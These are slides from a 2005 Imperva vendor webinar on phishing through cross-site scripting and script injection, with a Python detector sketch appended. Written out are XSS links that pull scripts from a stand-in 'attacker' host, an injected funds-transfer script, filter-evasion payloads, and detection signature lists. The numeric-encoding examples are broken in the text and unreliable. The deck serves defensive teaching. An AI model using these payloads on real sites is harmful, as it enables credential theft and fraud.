Phishing: When Attacks Get Embedded in Legitimate Websites
Live Webinar
May 26, 2005
Imperva Confidential 2
A Word from our Sponsor
Imperva
Mission: Secure the Data Center
Product: SecureSphere Dynamic Profiling Firewall
– Protects proprietary information, custom business applications, and critical servers
– Addresses phishing, identity theft, data theft, malicious robots, worms, denial of service, and SQL injection
– Stops web attacks, database breach, and worm infection
Diagram labels: Internal Users; SecureSphere Gateways; SecureSphere Management Server; Data Center (Proprietary Information, Custom Business Applications and Critical Servers)

Today’s Presenter
Amichai Shulman - CTO of Imperva
Amichai Shulman
– Lecturer on Info Security for Technion - Israel Institute of Technology
– CTO of Edvice, security consultant to banks and financial services firms
– Leads the Application Defense Center (ADC)
Application Defense Center (ADC)
– Attack and defense techniques presented today are the result of research done at Imperva’s Application Defense Center
ADC Data Center Security Series
– Monthly live webinars on attacks targeting corporate data centers
– “Identity Theft” on 6/23 - register at impervaevents.webex.com

Phishing
Agenda
• What is Phishing
– Sizing the Threat
– Types of Phishing (demo)
– Commonly Proposed Solutions
• Phishing Techniques
– Cross Site Scripting Phishing (demos)
– Script Injection Phishing (demo)
• Phishing Defenses
– Traditional Defenses
– Evasion Techniques
– Alternative Solutions

Phishing Threat
What is Phishing?
• Phishing = Social Engineering + Technical Subterfuge
• Objective
– Steal victim’s credentials
– Commit crimes using stolen credentials
• Delivery Mechanism
– Spoofed E-mail (or website or IM or Weblogs)
• Link Sends User to…
– Bogus Website Phishing
– Real Website Phishing

Phishing Threat
How Significant?
• 64 brands reported hijacked by Phishing in Feb., 05
• Dramatic growth over past 2 years
• Attack Implications
– Lost Revenue
– Brand Erosion
– Regulatory Issues
  • GLB
  • SoX
  • CA 1386
  • HIPAA
Source: antiphishing.org

Bogus Website Phishing Attack
Stealing login and password

Bogus Website Phishing
The Bait
• Use social engineering (such as email) to get the victim to click on a link that carries the attack

Bogus Website Phishing
Attack - Easy to Detect
• Manual Solutions
– User education
– User looking at URL sees the website is fraudulent
• Automated Solutions
– Industry efforts for strict server authentication
– Ex. client side plug-ins (TrustBar, NetIBA, etc.)
http://www.attacker.com

Real Website Phishing Demonstration
Stealing login and password

Proposed Solutions for Phishing Problem
Are they sufficient?

Real Website Phishing Threat
Proposed Solutions
• User awareness
– Real Website Phishing has the correct URL and real certificates
• Server authentication
– Real Website Phishing attacks will authenticate correctly
• Hardware Tokens
– Real Website Phishing attacks are run on victim’s system
• Time sensitive or one-time use passwords
– Real Website Phishing can exploit the credentials in real-time

Real Website Phishing Techniques

Real Website Phishing Threat
Phishing Techniques
• Cross Site Scripting
– User interacts with real website
– The malicious code is stored at the attacker’s site or in the link itself
• Script Injection
– User interacts with real website
– The malicious code is stored inside the real website’s application database

Technique #1
Cross Site Scripting (XSS)

Cross Site Scripting
How is it Done?
• Attack code written in standard client side script language
– E.g. JavaScript, VBScript, etc.
• Link in e-mail mixes calls to real website with attack code
– Attack code could be invoked from attacker’s website
  • http://www.superveda.com/login.asp?return=javascript.src=http://www.attacker.com/logincapture.jscript
– Attack could be completely incorporated into the link
  • http://www.superveda.com/dosearch.asp?return=<script> ATTACK </script>
• Returned webpage mixes both real website and attack

Cross Site Scripting (XSS) Phishing Demonstration
Stealing cookie credentials

Technique #2
Script Injection

Script Injection
How is it Done?
• A close relative of Cross Site Scripting (XSS)
• Difference is location of attack code
– XSS - attacker’s website or in the malicious link
– Script Injection - real web application’s database
• Location makes all the difference
– No action required by user
  • Attack runs when victim loads the web page
– Link can be totally benign
  • Attack not in the link, the attack is in the site
– Potential liability for website owner since the attack is inside the website

Script Injection Phishing Demonstration
Attack embedded in real website database

Real Website Phishing Threat
Attacks Can Be Anything…
• Steal user login credentials
• Steal cookie credentials
• Force victim to execute an action
– Any action the victim is allowed to do on the website
– Script injected in banking site to transfer funds:
    f = document.forms['transfer_money']
    f.to_account.value = 'Attackers Account'
    f.amount.value = 1000000;
    f.submit()

Cross Site Scripting Phishing Demonstration (2)
Victim unknowingly makes a purchase

Traditional Defenses

Traditional Defenses
Identifying Attacks
• Attacks contain <script>, javascript, or vbscript tags
• Widely known attack vectors
– <script>alert()</script>
– <script src="http://attacker/script.js"></script>
– <img src="javascript: alert()">
– <img src="vbscript: alert()">
• Other HTML attributes may contain active code
– <body background="javascript: alert()">
– <bgsound src="javascript: alert()">
– <iframe src="javascript: alert()"></iframe>

Traditional Defenses
Are Signatures Enough?
• Solution?
– Signature based mechanism
– Block all requests with specified text string
  • “<script>”, “javascript:” or “vbscript:”
• NO!
– Numerous ways to evade signature engines
– Evasions exploit richness and lax parsing of HTML language

Signature Evasion Techniques
• Whitespaces
• Numerical Character Encoding
• CSS (Cascading Style Sheets)
• Event Handlers

Evasion Techniques
Whitespaces
• When between tokens or inside HTML strings, HTML parsers usually ignore line feeds, carriage returns, horizontal tabs and null characters
• Instead of “javascript:” we can write: Javascrip t:

Evasion Techniques
Numerical Character Encoding
• Encode characters inside HTML strings as numerical values
• Only the word string in <tag attribute="string"> can be numerically encoded
• Enables attack to evade detection of the “javascript:” pattern string by encoding one or more of its characters
• 25 different ways to encode ‘j’:
‘j’ = j = j = … = j
= j = j = … = j =
= j = j ...
• The semicolons are often not required, so we get an even greater variety of encodings

Evasion Techniques
CSS (Style Sheets)
• Style attributes can also be dynamically computed using JavaScript code:
– <div style="width: expression(alert('Imperva'))">
• Style sheets need not be embedded in HTML code; they can be imported from another file, even on a different host (e.g., the attacker’s) using the <link> tag
• In http://attacker/attack.css:
    p {
      background-image: expression(alert("Imperva"));
    }
• In the attack vector:
    <link rel="stylesheet" href="http://attacker/attack.css">
    <p></p>

Evasion Techniques
Event Handlers
• HTML event handlers are implicitly assumed to be in JavaScript, and therefore do not require the “javascript:” directive:
– <body onLoad="alert(c)">
– <img src="http://wherever/doesnt_exist.jpg" onError="alert()">
– <marquee onStart="alert()"></marquee>
• More:
– <div style='position: absolute; left: 0px; top: 0px; height=1000px; width=1000px' onMouseOver="alert()"></div>
– <table onMouseOver="alert()" height=1000 width=1000>
• Many more event handlers (up to 80!) can be utilized

Evaluating Alternative Defenses
• Traditional Defenses
• Application Aware Defenses

Evaluating Alternative Defenses
Traditional Defense
• Apply very large set of signatures to ALL traffic
  • onLoad, onMouseOver, onFocus, …
  • <script>, <link>, <img>, style=, …
  • Many more we haven’t covered here
• Problems
– Easy to evade with client-side encoding features
  • e.g. whitespace, numerical encoding, etc.
– Multiple signatures have performance penalty
– Multiple signatures result in false positives
– Cannot block everything that remotely resembles HTML (i.e. that has <angle> brackets or an equal sign)
  • In some places users are allowed to type in HTML code

Evaluating Alternative Defenses
Application Aware Defense
• Focus the search
– Only inspect relevant fields
  • Identify dynamic pages, parse HTTP correctly
– Don’t bother with fields that normally accept scripts
  • e.g. forms that allow editing of HTML text
– Detect attacks only if field contains suspicious characters
  • < > = & # etc.
• Cover all cases
– Normalize input using client-side decoding
  • Remove redundant white space and decode numerical HTML and style sheet encodings
– Apply client side decoding only if required
– Create a comprehensive set of signatures
Minimize performance penalty & maximize accuracy
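
The application-aware steps above, run against the whitespace, numerical-encoding, CSS and event-handler evasions from the earlier slides. This is an added sketch, not code from the webinar or from SecureSphere; the signature set, the parameter names (`q`, `body`) and the sample inputs are constructed assumptions.

```python
import html
import re

# Literal strings from the "Are Signatures Enough?" slide, matched on raw input.
NAIVE_STRINGS = ("<script>", "javascript:", "vbscript:")

# Characters the "Application Aware Defense" slide lists as suspicious.
SUSPICIOUS = re.compile(r"[<>=&#]")

# Characters the "Whitespaces" slide says HTML parsers usually ignore.
IGNORED = re.compile(r"[\x00\t\n\r]")

# Illustrative signature set (an assumption), applied only to normalized input.
HANDLERS = "load|error|start|mouseover|focus"  # handlers named on the slides
SIGNATURES = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "script-uri": re.compile(r"(?:java|vb)script\s*:", re.I),
    "css-expression": re.compile(r"expression\s*\(", re.I),
    "event-handler": re.compile(r"\bon(?:%s)\s*=" % HANDLERS, re.I),
    "remote-stylesheet": re.compile(r"<\s*link\b[^>]*\bhref\s*=", re.I),
}


def naive_match(value):
    """Plain substring check on the raw value, with no decoding."""
    lowered = value.lower()
    return any(s in lowered for s in NAIVE_STRINGS)


def normalize(value):
    """Client-side decoding: resolve character references once, as a browser
    does, then drop the characters the parser would ignore."""
    return IGNORED.sub("", html.unescape(value))


def inspect_request(params, html_fields=frozenset()):
    """Return {parameter: [signature names]} for suspicious parameters.

    html_fields (hypothetical profile data) names fields that legitimately
    accept markup and are therefore not inspected.
    """
    findings = {}
    for name, value in params.items():
        if name in html_fields:
            continue  # field normally accepts HTML
        if not SUSPICIOUS.search(value):
            continue  # cheap prefilter: nothing to decode or match
        clean = normalize(value)
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(clean)]
        if hits:
            findings[name] = hits
    return findings


# Constructed sample values, based on the vectors shown on the slides.
SAMPLES = {
    "plain": '<img src="javascript: alert()">',
    "tab": '<img src="java\tscript: alert()">',
    "decimal": '<img src="&#106;avascript: alert()">',
    "no_semicolon": '<img src="&#0000106avascript: alert()">',
    "handler": '<body onLoad="alert()">',
    "css": "<div style=\"width: expression(alert('Imperva'))\">",
    "benign": "price >= 10 & size = L",
}


def compare():
    """Map each sample to (naive verdict, application-aware verdict)."""
    return {name: (naive_match(v), bool(inspect_request({"q": v})))
            for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, aware) in compare().items():
        print(f"{name:13} naive={naive!s:5} application-aware={aware}")
```
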

A Practical Approach to Real Website Phishing

SecureSphere Dynamic Profiling Firewall
Application Aware Defense
• ADC Signatures
– Comprehensive set of signatures
• Dynamic Profiling
– Identifies the relevant fields for signature checking
– Automatically models the structure and dynamics of:
  • Web Application: URLs, cookies, users, parameters, sessions, etc.
  • Database: SQL queries, tables, parameters, users, etc.
• Automatically updated
– ADC Signatures updated on regular basis
– Dynamic Profiling automatically adapts to app/db changes
Diagram labels: Internal Users; SecureSphere Gateways; SecureSphere Management Server; Data Centers

Q & A

Thank You
Imperva, Inc.
950 Tower Lane, Suite 1710
Foster City, CA 94404
Sales: (866) 926-4678
www.imperva.com